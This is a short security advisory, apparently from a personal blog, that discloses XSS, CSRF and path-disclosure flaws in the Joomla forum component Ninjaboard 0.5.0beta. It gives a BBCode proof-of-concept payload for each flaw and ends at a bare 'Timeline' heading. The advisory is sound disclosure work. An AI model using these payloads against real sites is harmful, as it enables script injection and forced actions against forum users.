jeffchannell.com

Ninjaboard 0.5.0beta Multiple Vulnerabilities

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

The Joomla component Ninjaboard 0.5.0beta suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as a minor CSRF vulnerability and a minor Path Disclosure vulnerability.

  1. XSS 1: Nested [img] Tags

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. XSS 2: JavaScript links

    [url=javascript:alert('xss');]http://google.com[/url]

    Requires minimal user interaction

  3. XSS 3: CSS Injection

    [color=#ff0000;font-size:expression(document.write(String.fromCharCode(88,83,83)))]XSS[/color]
  4. XSS 4: Nested [url] Tags

    Requires minimal user interaction, displays indications of malware, but still technically exploitable.

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  5. CSRF: [img] Tags

    [img]http://victim-site.com/index.php?option=com_user&task=logout[/img]
  6. Path Disclosure: Profile View 'id' parameter

    Passing non-numeric values for the 'id' parameter of the profile page results in a Fatal Error, which reveals the full path to components/com_ninjaboard/models/profile.php.

    index.php?option=com_ninjaboard&view=profile&id='

These issues are fixed in the latest release, and users are urged to upgrade.

Timeline